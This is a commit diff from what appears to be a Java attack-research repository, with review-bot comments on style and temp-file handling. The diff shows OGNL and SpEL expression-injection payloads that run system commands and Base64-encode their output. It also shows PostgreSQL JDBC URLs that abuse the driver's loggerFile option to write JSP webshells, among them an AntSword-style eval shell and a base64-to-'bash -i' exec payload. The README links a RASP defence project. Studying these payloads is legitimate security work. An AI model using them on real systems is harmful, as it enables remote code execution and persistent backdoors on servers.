
Commit e85cce2

committed
add PPPRASP link :)
1 parent 3c830e1 commit e85cce2


6 files changed

+23
-3
lines changed

6 files changed

+23
-3
lines changed

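--- a/Expression/OGNLAttack/src/main/java/org/example/OGNL.java
+++ b/Expression/OGNLAttack/src/main/java/org/example/OGNL.java
@@ -46,7 +46,8 @@ public static void main(String[] args) {
 /**
 * base64加密
 */
-// 原生 > JDK8 todo
+// 原生 > JDK8
+// todo 其他写法
 String base64Encode = "(#[email protected]@getRuntime().exec('ifconfig').getInputStream()).(@java.util.Base64@getEncoder().encodeToString((new java.util.Scanner(#inputStream).useDelimiter('\\\\A').next().getBytes())))";
 // // 用 IOUtils 实现
 String base64EncodeIOUtils = "(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('ifconfig').getInputStream(),'UTF-8')).(#[email protected]@getEncoder().encodeToString(#str.getBytes()))";
@@ -59,6 +60,10 @@ public static void main(String[] args) {
 // 延时
 String sleep = "@java.lang.Thread@sleep(10000)";
 
+/**
+* todo 类加载
+*/
+
 
 Object obj = ognlGetValue(sleep);
 System.out.println(obj);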
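Review bot: The added `/** … */` block before `Object obj = ognlGetValue(sleep);` (and the identical one added in SPEL.java) is a Javadoc comment inside a method body, where documentation tools ignore it; a plain line comment such as `// TODO: class-loading variant` matches the `//` style of the other markers in this hunk. The header above the first payload string, `base64加密`, labels Base64 as encryption, but the expression only encodes the command output; `// Base64-encode the output (encoding, not encryption)` would avoid that confusion. `main` starts and ends outside both hunks.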

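--- a/Expression/SPELAttack/src/main/java/com/example/spelattack/SPEL.java
+++ b/Expression/SPELAttack/src/main/java/com/example/spelattack/SPEL.java
@@ -24,6 +24,10 @@ public static void main(String[] args) {
 // 延时
 String sleep = "T(java.lang.Thread).sleep(10000)";
 
+/**
+* todo 类加载
+*/
+
 
 Object obj = spel(sleep);
 System.out.println(obj);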

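--- a/FilesOperations/src/main/java/org/example/FileRead.java
+++ b/FilesOperations/src/main/java/org/example/FileRead.java
@@ -14,6 +14,7 @@ public class FileRead {
 */
 public String read_InputStreamReader(String filePath) throws Exception {
 FileInputStream fileInputStream = new FileInputStream(filePath);
+
 InputStreamReader inputStreamReader = new InputStreamReader(fileInputStream);
 int character;
 StringBuilder content = new StringBuilder();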

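--- a/FilesOperations/src/main/java/org/example/FileWrite.java
+++ b/FilesOperations/src/main/java/org/example/FileWrite.java
@@ -6,6 +6,13 @@
 * @author Whoopsunix
 */
 public class FileWrite {
+
+public static void main(String[] args) throws Exception{
+String path = "/tmp/1.txt";
+String content = "Hello World!";
+new FileWrite().write_FileWriter_CharArrayWriter(path, content);
+}
+
 /**
 * java.io.FileWriter
 */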
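Review bot: The added `main` hard-codes `/tmp/1.txt` as the write target, a fixed name in a shared, world-writable directory that does not exist on Windows and that another local user could pre-create or symlink before the demo runs. A per-run temporary file avoids both problems: `String path = java.nio.file.Files.createTempFile("filewrite-demo", ".txt").toString();`. As a style point, `throws Exception{` is missing the space before the brace that FileRead.java uses (`throws Exception {`). The body of `write_FileWriter_CharArrayWriter` lies outside this hunk, so whether it closes its writer cannot be checked from here.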

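--- a/JDBCAttack/PostgreSQLAttack/src/main/java/org/example/FileAttack.java
+++ b/JDBCAttack/PostgreSQLAttack/src/main/java/org/example/FileAttack.java
@@ -43,7 +43,8 @@ public static void main(String[] args) throws Exception {
 String jspExecContent = "<%Runtime.getRuntime().exec(\"open -a Calculator.app\");%>";
 // pass: ant type: jspjs el
 String antShellContent = "<%out.print(org.apache.jasper.runtime.PageContextImpl.proprietaryEvaluate(request.getParameter(\"ant\"), String.class, pageContext, null));%>";
-// 曲线写入 在ROOT目录下写入 godzilla默认shell 2.jsp todo 完善
+// 曲线写入 本质还是命令执行 在ROOT目录下写入 godzilla默认shell 2.jsp
+// todo 完善
 String godzillaShellContent = "<%Runtime.getRuntime().exec(\"bash -c {echo,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}|{base64,-d}|{bash,-i}\");%>";
 String elWriteAttackURL2 = String.format("jdbc:postgresql://127.0.0.1:5432/test/?loggerLevel=DEBUG&loggerFile=%s&%s=", writePath, godzillaShellContent);
 System.out.println(elWriteAttackURL2);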

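--- a/README.md
+++ b/README.md
@@ -10,7 +10,9 @@ By. Whoopsunix
 
 🚧 长期项目 不定期学习后更新......
 
-部分 RceDemo 已经集成在二开 [ysoserial](https://github.com/Whoopsunix/ysoserial) 项目中
+🛰️ 部分利用已经集成在二开 [ysoserial](https://github.com/Whoopsunix/ysoserial) 项目中
+
+🪝 [PPPRASP](https://github.com/Whoopsunix/PPPRASP) 项目中对本项目给出的漏洞实现防护(仅实现关键函数的 HOOK,不作进一步处理)
 
 ## 目录
 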